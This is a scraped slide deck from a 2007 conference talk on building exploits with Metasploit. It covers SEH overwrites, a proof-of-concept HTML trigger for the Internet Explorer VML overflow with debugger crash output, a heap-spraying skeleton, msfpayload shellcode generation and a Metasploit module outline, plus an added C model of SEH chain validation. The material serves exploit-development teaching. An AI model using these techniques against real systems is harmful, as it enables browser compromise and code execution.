More on Metasploit plugins: from vulnerability to exploit. Saumil Shah, CEO, net-square. IT Underground - Prague 2007
# who am i
    # who am i
    16:08  up  4:26, 1 user, load averages: 0.28 0.40 0.33
    USER    TTY      FROM  LOGIN@  IDLE  WHAT
    saumil  console  -     11:43   0:05  bash
From Vulnerability to Exploit (flow diagram): Fuzzing; EIP = 0x41414141; Debugger; Attack Vector; Reliable EIP return address; Bad characters; Test Shellcode (INT 3); INT 3?; Final Shellcode; Working exploit; Shellcode Handling
The CPU’s registers
    EAX  accumulator
    EBX  base
    ECX  counter
    EDX  data
    ESI  source index
    EDI  destination index
    EBP  base pointer
    ESP  stack pointer
    EIP  instruction pointer
The Process Memory Map (diagram): environment vars; cmd line arguments; **envp; **argv; argc; main() local vars; …; v heap; ^ stack; …; heap - malloc’ed data; .bss; .data; .text. Address labels: 0xc0000000, 0x08000000
Win32 Process Memory Map (diagram): No access; Shared user page; PEB; First TEB; DLLs; DLLs; DLLs; heap; program image; error trapping; stack. Address labels: 0x7FFFFFFF, 0x7FFE1000, 0x7FFE0000, 0x7FFDF000, 0x7FFDE000, 0x40000000, 0x00010000, 0x00000000
Exploit example - IE VML overflow
Windows SEH
Exception handling
    try {
        :  code that may throw
        :  an exception.
    } catch {
        :  attempt to recover from
        :  the exception gracefully.
    }
Exception handling … implementation (stack diagram): params; saved EIP; saved EBP; Bottom of stack; more frames; frame w/ exception handling; local vars; addr of exception handler; exception handler code (catch block)
SEH Record (diagram): address of exception handler; ptr to next SEH record
SEH Chain (diagram): addr of ex_handler1, ptr to SEH_record_2; addr of ex_handler2, ptr to next SEH_record_n; default exception handler, 0xFFFFFFFF; MSVCRT!exhandler; ex_handler1(); ex_handler2(); bottom of stack
SEH on the stack (diagram): address of exception handler, 0xFFFFFFFF; main(); ^ stack; func_z(); initial entry frame; MSVCRT!exhandler; address of exception handler, ptr to next SEH record; ex_handler_z(); params; saved EBP; saved EIP; local vars
Yet another way of getting EIP
Overwriting SEH (stack diagram): address of exception handler; ptr to next SEH record; ex_handler(); params; saved EBP; saved EIP; buffer
Overwriting SEH (stack diagram: every slot shown now reads AAAA; ex_handler() is drawn alongside). Illegal memory access causes segmentation fault. OS invokes registered exception handler in the chain. EIP = 0x42424242
ie_vml1
    <head>
    <object id="VMLRender" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">
    </object>
    <style>v\:* { behavior: url(#VMLRender); }</style>
    </head>
    <body>
    <v:rect style='width:120pt;height:80pt' fillcolor="red">
    <script>
    document.write("<v:fill method =&quot;");
    for(i = 0; i < 2625; i++)
        document.write("&#x4141&#x4141&#x4141&#x4141");
    document.write("&quot;>");
    </script>
    </v:rect></v:fill></body>
Setting up the exploit
    $ ./daemon.pl ie_vml1.html
    [*] Starting HTTP server on 8080
    0:005> gh
Crashing IE
    (18c.584): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=0013b4c4 ebx=001df20c ecx=0013b4b8 edx=00004141 esi=0000259e edi=00140000
    eip=5deded1e esp=0013b4a0 ebp=0013b6c8 iopl=0  nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000206
    *** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll -
    vgx!$DllMain$_gdiplus+0x30e8d:
    5deded1e 668917  mov  [edi],dx  ds:0023:00140000=6341
    0:000> !exchain
    0013e420: 41414141
    Invalid exception stack at 41414141
Crashing IE
    0:000> !exchain
    0013e420: 41414141
    Invalid exception stack at 41414141
    0:000> g
    (18c.584): Access violation - code c0000005 (first chance)
    First chance exceptions are reported before any exception handling.
    This exception may be expected and handled.
    eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
    eip=41414141 esp=0013b0d0 ebp=0013b0f0 iopl=0  nv up ei pl zr na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000  efl=00000246
    41414141 ??  ???
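Added example, not from the original slides: a simplified model, in C, of the chain walk behind the !exchain output above. It checks each SEH record (next pointer at offset 0, handler at offset 4) against a stack snapshot and stops at the first inconsistency; the snapshot addresses, handler values and the set of checks are constructed assumptions, not Windows' own validation code.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define SEH_END     0xFFFFFFFFu  /* end-of-chain marker, as on the SEH Chain slide */
#define SEH_MAX     64           /* assumed cap on chain length */
#define STACK_WORDS 64           /* size of the constructed snapshots */
#define BASE        0x0013e400u  /* constructed so a record sits at 0013e420 */

typedef enum { SEH_OK, SEH_BAD_RECORD, SEH_BAD_ORDER,
               SEH_HANDLER_ON_STACK, SEH_TOO_LONG } seh_status;

typedef struct {
    uint32_t base;           /* address of words[0], the lowest address */
    const uint32_t *words;   /* stack contents, one 32-bit value per slot */
    size_t nwords;
} stack_image;

typedef struct {
    seh_status status;
    uint32_t where;          /* offending address, 0 when the chain is intact */
    int records;             /* records accepted before the walk stopped */
} seh_result;

/* True when [addr, addr+len) lies inside the snapshot. */
static int on_stack(const stack_image *s, uint32_t addr, uint32_t len)
{
    uint64_t end = (uint64_t)s->base + (uint64_t)s->nwords * 4;
    return addr >= s->base && (uint64_t)addr + len <= end;
}

static uint32_t read32(const stack_image *s, uint32_t addr)
{
    return s->words[(addr - s->base) / 4];
}

static seh_result fail(seh_result r, seh_status st, uint32_t where)
{
    r.status = st;
    r.where = where;
    return r;
}

/* Walk the chain from head until SEH_END or the first inconsistency. */
seh_result seh_validate(const stack_image *s, uint32_t head)
{
    seh_result r = { SEH_OK, 0, 0 };
    uint32_t cur = head, prev = 0;

    while (cur != SEH_END) {
        if (r.records >= SEH_MAX)
            return fail(r, SEH_TOO_LONG, cur);
        if ((cur & 3) != 0 || !on_stack(s, cur, 8))
            return fail(r, SEH_BAD_RECORD, cur);   /* record not on the stack */
        if (r.records > 0 && cur <= prev)
            return fail(r, SEH_BAD_ORDER, cur);    /* chain loops or runs backwards */
        uint32_t next = read32(s, cur);
        uint32_t handler = read32(s, cur + 4);
        if (on_stack(s, handler, 1))
            return fail(r, SEH_HANDLER_ON_STACK, handler);
        r.records++;
        prev = cur;
        cur = next;
    }
    return r;
}

static seh_result run(const uint32_t *w)
{
    stack_image s = { BASE, w, STACK_WORDS };
    return seh_validate(&s, BASE + 0x20);          /* head record at 0013e420 */
}

seh_result demo_intact(void)         /* two records, second ends the chain */
{
    static uint32_t w[STACK_WORDS];
    w[8]  = BASE + 0x60; w[9]  = 0x00401000u;      /* constructed handler */
    w[24] = SEH_END;     w[25] = 0x00402000u;      /* constructed handler */
    return run(w);
}

seh_result demo_smashed(void)        /* every slot overwritten, as in the crash */
{
    static uint32_t w[STACK_WORDS];
    for (size_t i = 0; i < STACK_WORDS; i++) w[i] = 0x41414141u;
    return run(w);
}

seh_result demo_stack_handler(void)  /* handler field points into the stack */
{
    static uint32_t w[STACK_WORDS];
    w[8] = SEH_END; w[9] = BASE + 0x40;
    return run(w);
}

seh_result demo_loop(void)           /* second record points back at the first */
{
    static uint32_t w[STACK_WORDS];
    w[8]  = BASE + 0x60; w[9]  = 0x00401000u;
    w[24] = BASE + 0x20; w[25] = 0x00402000u;
    return run(w);
}

int main(void)
{
    seh_result r = demo_smashed();
    printf("status=%d where=%08x records=%d\n", r.status, (unsigned)r.where, r.records);
    return 0;
}
```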
EIP = 0x41414141
How do we pull it off?
Loading our buffer in the heap
Heap Spraying
Heap Spraying (diagram: array elements a[7], a[8], a[9], each labelled "NOP sled" and "shellcode")
    <script>
    :
    spray = build_large_nopsled();
    a = new Array();
    for(i = 0; i < 100; i++)
        a[i] = spray + shellcode;
    :
    </script>
    <html>
    :
    exploit trigger condition
    goes here
    :
    </html>
Tips on Heap Spraying
ie_vml2
    $ ./daemon.pl ie_vml2.html
    [*] Starting HTTP server on 8080
    0:005> gh
Crashing IE again
    0:000> s 02000000 l fffffff 90 90 90 90 cc cc cc cc
    02150020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02360020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02570020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02780020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02990020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02ba0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02db0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    02fc0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    031d0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    033e0020  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
    : : :
Jump to heap
Introducing Metasploit
Introducing Metasploit
Enter Shellcode
Writing Shellcode
Injecting the shellcode
A little about shellcode
Payload Encoders
Payload Encoders (diagram labels: decoder; UnWQ89Jas281EEIIkla2wnhaAS901las; original shellcode (ascii 0-255))
Payload Encoders
Using Metasploit to generate shellcode
Generate calc.exe shellcode
    $ ./msfpayload win32_exec EXITFUNC="seh" CMD="calc.exe" R | ./jsencode.pl
Exit function - "thread" vs. "seh"
    $ ./msfpayload win32_exec EXITFUNC="thread" CMD="calc.exe" R | ./jsencode.pl
Writing Metasploit exploit modules
How Metasploit runs an exploit (diagram): List of known target values; user supplied exploit info; Metasploit Shellcode Library; Encoders; Payload handlers; create payload; launch attack; get connection; EXPLOIT; preamble
Writing a Metasploit exploit
Structure of the exploit perl module
    package Msf::Exploit::name;
    use base "Msf::Exploit";
    use strict;
    use Pex::Text;
    my $advanced = { };
    my $info = { };      # information block
    sub new { }          # constructor: return an instance of our exploit
    sub Exploit { }      # exploit block
%info
Metasploit Pex
Pex::Text
Pex::Socket
Pex - protocol specific utilities
Pex - miscellaneous utilities
metasploit_skel.pm
Finished examples
Some command line Metasploit tools
More command line Metasploit tools
New in Version 3.0
New in Version 3.0
Thank You! Saumil Shah [email_address] http://net-square.com +91 98254 31192


Writing Metasploit Plugins

  • 1. More on Metasploit plugins: from vulnerability to exploit. Saumil Shah, CEO, net-square. IT Underground - Prague 2007
  • 3. From Vulnerability to Exploit (flowchart labels): Fuzzing; EIP = 0x41414141; Debugger; Attack Vector; Reliable EIP return address; Bad characters; Test Shellcode (INT 3); INT 3?; Final Shellcode; Working exploit; Shellcode Handling
  • 5. The Process Memory Map (diagram labels): environment vars; cmd line arguments; **envp; **argv; argc; main() local vars; … v heap ^ stack …; heap - malloc’ed data; .bss; .data; .text. Addresses shown: 0xc0000000, 0x08000000
  • 6. Win32 Process Memory Map (diagram labels): No access; Shared user page; PEB; First TEB; DLLs; DLLs; DLLs; heap; program image; error trapping; stack. Addresses shown: 0x7FFFFFFF, 0x00000000, 0x00010000, 0x7FFE1000, 0x7FFE0000, 0x7FFDF000, 0x7FFDE000, 0x40000000
  • 10. Exception handling … implementation (stack diagram labels): params; saved EIP; saved EBP; Bottom of stack; more frames; frame w/ exception handling; local vars; addr of exception handler; exception handler code (catch block)
  • 13. SEH on the stack (diagram labels): address of exception handler; 0xFFFFFFFF; main(); ^ stack; func_z(); initial entry frame; MSVCRT!exhandler; address of exception handler; ptr to next SEH record; ex_handler_z(); params; saved EBP; saved EIP; local vars
  • 15. Overwriting SEH (diagram labels): address of exception handler; ptr to next SEH record; ex_handler(); params; saved EBP; saved EIP; buffer
  • 16. Overwriting SEH (diagram labels): AAAA AAAA AAAA : : : AAAA AAAA; ex_handler(); AAAA AAAA AAAA AAAA AAAA AAAA. Illegal memory access causes segmentation fault. OS invokes registered exception handler in the chain. EIP = 0x42424242
  • 25. Heap Spraying (diagram: repeated "NOP sled | shellcode" blocks at a[7], a[8], a[9])
        <script>
          :
          spray = build_large_nopsled();
          a = new Array();
          for(i = 0; i < 100; i++)
            a[i] = spray + shellcode;
          :
        </script>
        <html>
          :
          exploit trigger condition goes here
          :
        </html>
  • 43. How Metasploit runs an exploit (diagram labels): List of known target values; user supplied exploit info; Metasploit Shellcode Library; Encoders; Payload handlers; create payload; launch attack; get connection; EXPLOIT; preamble
  • 45. Structure of the exploit Perl module
        package Msf::Exploit::name;
        use base "Msf::Exploit";
        use strict;
        use Pex::Text;

        my $advanced = { };
        my $info = { };      # information block
        sub new { }          # constructor: return an instance of our exploit
        sub Exploit { }      # exploit block
  • 58. Thank You! Saumil Shah [email_address] http://net-square.com +91 98254 31192